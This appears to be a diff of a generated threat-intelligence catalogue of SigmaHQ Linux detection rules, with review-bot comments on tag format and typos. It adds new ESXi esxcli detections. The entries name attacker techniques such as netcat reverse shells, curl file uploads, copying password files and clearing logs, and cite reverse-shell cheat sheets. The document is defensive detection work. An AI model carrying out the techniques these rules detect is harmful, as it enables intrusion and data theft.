+ "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746",
 "value": "Linux Crypto Mining Pool Connections"
 },
@@ -92533,8 +95107,8 @@
 "refs": [
 "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html",
 "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection",
- "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/",
+ "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml"
 ],
 "tags": [
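Review bot: Replacing `"tags": "No established tags"` with a real array on the Linux Reverse Shell Indicator entry is the right shape, but the generator still emits that string sentinel for untagged rules (the `"tags": "No established tags"` context lines in the compliance hunks a few lines above are untouched), so `tags` stays a string on some entries and an array on others and every consumer must type-check it before iterating. Emitting `"tags": []` for a rule with no tags would make the field uniform across the file. The same string-to-array conversion, with a new `related` block pointing at an ATT&CK cluster, appears in the crypto-mining hunk on this line and in the Interactive Bash Suspicious Children and Linux Crypto Mining Indicators hunks that follow; the object they sit in starts outside each hunk.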
@@ -92684,8 +95258,8 @@
 "refs": [
 "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html",
 "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection",
- "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/",
+ "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml"
 ],
 "tags": [
@@ -92711,8 +95285,29 @@
 "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion",
+ "attack.t1059.004",
+ "attack.t1036"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55",
 "value": "Interactive Bash Suspicious Children"
 },
@@ -92764,8 +95359,8 @@
 "refs": [
 "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html",
 "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection",
- "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/",
+ "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml"
 ],
 "tags": [
@@ -92864,10 +95459,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://linuxhint.com/uninstall-debian-packages/",
 "https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command",
 "https://sysdig.com/blog/mitre-defense-evasion-falco",
 "https://linuxhint.com/uninstall_yum_package/",
+ "https://linuxhint.com/uninstall-debian-packages/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remove_package.yml"
 ],
 "tags": [
@@ -92975,8 +95570,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md",
 "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml"
 ],
 "tags": [
@@ -93042,8 +95637,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://blogs.blackberry.com/",
 "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144",
+ "https://blogs.blackberry.com/",
 "https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml"
 ],
@@ -93178,11 +95773,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://twitter.com/d1r4c/status/1279042657508081664",
- "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
 "https://curl.se/docs/manpage.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
+ "https://twitter.com/d1r4c/status/1279042657508081664",
 "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
+ "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml"
 ],
 "tags": [
@@ -93247,8 +95842,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://gtfobins.github.io/gtfobins/apt-get/",
 "https://gtfobins.github.io/gtfobins/apt/",
+ "https://gtfobins.github.io/gtfobins/apt-get/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml"
 ],
 "tags": [
@@ -93282,9 +95877,9 @@
 "logsource.product": "linux",
 "refs": [
 "https://linuxize.com/post/how-to-delete-group-in-linux/",
+ "https://www.cyberciti.biz/faq/linux-remove-user-command/",
 "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
 "https://linux.die.net/man/8/userdel",
- "https://www.cyberciti.biz/faq/linux-remove-user-command/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml"
 ],
 "tags": [
@@ -93353,8 +95948,20 @@
 "https://www.poolwatch.io/coin/monero",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.impact",
+ "attack.t1496"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1",
 "value": "Linux Crypto Mining Indicators"
 },
@@ -93371,8 +95978,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html",
 "https://www.cyberciti.biz/faq/how-force-kill-process-linux/",
+ "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_kill_process.yml"
 ],
 "tags": [
@@ -93550,6 +96157,32 @@
 "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79",
 "value": "System Network Connections Discovery - Linux"
 },
+ {
+ "description": "Detects execution of the \"esxcli\" command with the \"vm\" and \"kill\" flag in order to kill/shutdown a specific VM.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon",
+ "creation_date": "2023/09/04",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_esxcli_vm_kill.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html",
+ "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/",
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
+ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "2992ac4d-31e9-4325-99f2-b18a73221bb2",
+ "value": "ESXi VM Kill Via ESXCLI"
+ },
 {
 "description": "Detects execution of shells from a parent process located in a temporary (/tmp) directory",
 "meta": {
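Review bot: The new ESXi VM Kill entry carries only the tactic tag `attack.execution` and, unlike the three ESXi entries added further down (system discovery, syslog configuration change, VM list discovery), has no `related` array, so it is the one new ESXi cluster not linked to any ATT&CK technique. Given the ransomware references cited, an impact technique such as T1489 (Service Stop) with a matching `related` entry would arguably fit; since this file is generated from the SigmaHQ rule, the tag belongs in the upstream `proc_creation_lnx_esxcli_vm_kill.yml` rather than here. Separately, `"creation_date": "2023/09/04"` is the Sigma slash-separated form rather than an RFC 3339 date, so any consumer that parses dates as ISO 8601 will reject it; the same applies to the other three new ESXi entries.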
@@ -93565,8 +96198,8 @@
 "refs": [
 "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html",
 "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection",
- "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/",
+ "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml"
 ],
 "tags": [
@@ -93589,8 +96222,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://blogs.blackberry.com/",
 "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144",
+ "https://blogs.blackberry.com/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml"
 ],
 "tags": [
@@ -93817,8 +96450,8 @@
 "refs": [
 "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html",
 "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection",
- "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/",
+ "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml"
 ],
 "tags": [
@@ -93851,8 +96484,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
 "https://bpftrace.org/",
+ "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml"
 ],
 "tags": [
@@ -94029,9 +96662,9 @@
 "logsource.product": "linux",
 "refs": [
 "https://linuxize.com/post/how-to-delete-group-in-linux/",
- "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
- "https://www.cyberciti.biz/faq/linux-remove-user-command/",
 "https://linux.die.net/man/8/groupdel",
+ "https://www.cyberciti.biz/faq/linux-remove-user-command/",
+ "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml"
 ],
 "tags": [
@@ -94098,9 +96731,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/carlospolop/PEASS-ng",
 "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes",
 "https://github.com/diego-treitos/linux-smart-enumeration",
+ "https://github.com/carlospolop/PEASS-ng",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml"
 ],
 "tags": [
@@ -94187,6 +96820,48 @@
 "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194",
 "value": "Curl Usage on Linux"
 },
+ {
+ "description": "Detects execution of the \"esxcli\" command with the \"system\" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.",
+ "meta": {
+ "author": "Cedric Maurugeon",
+ "creation_date": "2023/09/04",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_esxcli_system_discovery.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html",
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033",
+ "attack.t1007"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "e80273e1-9faf-40bc-bd85-dbaff104c4e9",
+ "value": "ESXi System Information Discovery Via ESXCLI"
+ },
 {
 "description": "Detects usage of the \"touch\" process in service file.",
 "meta": {
@@ -94200,8 +96875,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://blogs.blackberry.com/",
 "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144",
+ "https://blogs.blackberry.com/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml"
 ],
 "tags": [
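Review bot: The `description` of the new ESXi System Information Discovery entry ends in a sentence fragment, `...the different component of the system. Such as accounts, modules, NTP, etc.`, which reads awkwardly wherever the galaxy renders it; `...the different components of the system, such as accounts, modules, NTP, etc.` says the same thing in one sentence. Because this file is generated from the SigmaHQ rule named in `filename`, the wording should be corrected in `proc_creation_lnx_esxcli_system_discovery.yml` upstream so the next regeneration does not undo it.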
@@ -94254,6 +96929,48 @@
 "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31",
 "value": "Linux Network Service Scanning"
 },
+ {
+ "description": "Detects changes to the ESXi syslog configuration via \"esxcli\"",
+ "meta": {
+ "author": "Cedric Maurugeon",
+ "creation_date": "2023/09/04",
+ "falsepositive": [
+ "Legitimate administrative activities"
+ ],
+ "filename": "proc_creation_lnx_esxcli_syslog_config_change.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US",
+ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001",
+ "attack.t1562.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "8f504411-cb96-4dac-a537-8d2bb7679c59",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "38eb1dbb-011f-40b1-a126-cf03a0210563",
+ "value": "ESXi Syslog Configuration Change Via ESXCLI"
+ },
 {
 "description": "Detects execution of the bash shell with the interactive flag \"-i\".",
 "meta": {
@@ -94292,8 +97009,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://blogs.blackberry.com/",
 "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144",
+ "https://blogs.blackberry.com/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml"
 ],
 "tags": [
@@ -94336,6 +97053,50 @@
 "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b",
 "value": "Disable Or Stop Services"
 },
+ {
+ "description": "Detects execution of the \"esxcli\" command with the \"vm\" flag in order to retrieve information about the installed VMs.",
+ "meta": {
+ "author": "Cedric Maurugeon",
+ "creation_date": "2023/09/04",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_esxcli_vm_discovery.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html",
+ "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/",
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
+ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033",
+ "attack.t1007"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "5f1573a7-363b-4114-9208-ad7a61de46eb",
+ "value": "ESXi VM List Discovery Via ESXCLI"
+ },
 {
 "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks",
 "meta": {
@@ -94369,6 +97130,91 @@
 "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31",
 "value": "Commands to Clear or Remove the Syslog"
 },
+ {
+ "description": "Detects execution of the \"esxcli\" command with the \"storage\" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon",
+ "creation_date": "2023/09/04",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_esxcli_storage_discovery.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
+ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html",
+ "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033",
+ "attack.t1007"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "f41dada5-3f56-4232-8503-3fb7f9cf2d60",
+ "value": "ESXi Storage Information Discovery Via ESXCLI"
+ },
+ {
+ "description": "Detects execution of the \"esxcli\" command with the \"network\" flag in order to retrieve information about the network configuration.",
+ "meta": {
+ "author": "Cedric Maurugeon",
+ "creation_date": "2023/09/04",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_esxcli_network_discovery.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
+ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033",
+ "attack.t1007"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "33e814e0-1f00-4e43-9c34-31fb7ae2b174",
+ "value": "ESXi Network Configuration Discovery Via ESXCLI"
+ },
 {
 "description": "Detects java process spawning suspicious children",
 "meta": {
@@ -94402,6 +97248,41 @@
 "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892",
 "value": "Suspicious Java Children Processes"
 },
+ {
+ "description": "Detects listing of the inodes of the \"/\" directory to determin if the we are running inside of a container.",
+ "meta": {
+ "author": "Seth Hanford",
+ "creation_date": "2023/08/23",
+ "falsepositive": [
+ "Legitimate system administrator usage of these commands",
+ "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered"
+ ],
+ "filename": "proc_creation_lnx_susp_inod_listing.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker",
+ "https://blog.skyplabs.net/posts/container-detection/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1082"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "43e26eb5-cd58-48d1-8ce9-a273f5d298d8",
+ "value": "Potential Container Discovery Via Inodes Listing"
+ },
 {
 "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n",
 "meta": {
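Review bot: The description of the new "Potential Container Discovery Via Inodes Listing" entry contains two typos: `to determin if the we are running inside of a container` should read `to determine if we are running inside of a container`. This text is what analysts see when the cluster is rendered, so it is worth correcting at the source as well if the file is regenerated from the upstream rule.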
@@ -94569,8 +97450,8 @@
 "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
 "https://man7.org/linux/man-pages/man1/ncat.1.html",
 "https://www.revshells.com/",
- "https://www.infosecademy.com/netcat-reverse-shells/",
 "https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/",
+ "https://www.infosecademy.com/netcat-reverse-shells/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml"
 ],
 "tags": [
@@ -94603,13 +97484,25 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://www.computerhope.com/unix/unohup.htm",
 "https://en.wikipedia.org/wiki/Nohup",
 "https://gtfobins.github.io/gtfobins/nohup/",
+ "https://www.computerhope.com/unix/unohup.htm",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.t1059.004"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2",
 "value": "Nohup Execution"
 },
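Review bot: The `tags` key changes type in the "Nohup Execution" hunk — the removed line carried the string sentinel `"tags": "No established tags"`, the new side an array — so every entry still in the string form leaves `tags` as a string-or-array union that consumers must special-case before iterating. The same conversion appears in the "Potentially Suspicious Execution From Tmp Folder" hunk further down. A single shape (an empty array, `"tags": []`, when a rule has no tags) would let consumers iterate unconditionally; if the sentinel is emitted by the generator rather than hand-written, that is the place to change it.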
@@ -94726,6 +97619,49 @@
 "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c",
 "value": "Connection Proxy"
 },
+ {
+ "description": "Detects execution of the \"esxcli\" command with the \"vsan\" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon",
+ "creation_date": "2023/09/04",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_esxcli_vsan_discovery.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
+ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html",
+ "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033",
+ "attack.t1007"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "d54c2f06-aca9-4e2b-81c9-5317858f4b79",
+ "value": "ESXi VSAN Information Discovery Via ESXCLI"
+ },
 {
 "description": "Detects known hacktool execution based on image name",
 "meta": {
@@ -94739,10 +97675,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
+ "https://github.com/pathtofile/bad-bpf",
+ "Internal Research",
 "https://github.com/Gui774ume/ebpfkit",
 "https://github.com/carlospolop/PEASS-ng",
- "Internal Research",
- "https://github.com/pathtofile/bad-bpf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml"
 ],
 "tags": [
@@ -94752,6 +97688,74 @@
 "uuid": "a015e032-146d-4717-8944-7a1884122111",
 "value": "Linux HackTool Execution"
 },
+ {
+ "description": "Detects listing or file reading of \".dockerenv\" which can be a sing of potential container discovery",
+ "meta": {
+ "author": "Seth Hanford",
+ "creation_date": "2023/08/23",
+ "falsepositive": [
+ "Legitimate system administrator usage of these commands",
+ "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered"
+ ],
+ "filename": "proc_creation_lnx_susp_dockerenv_recon.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
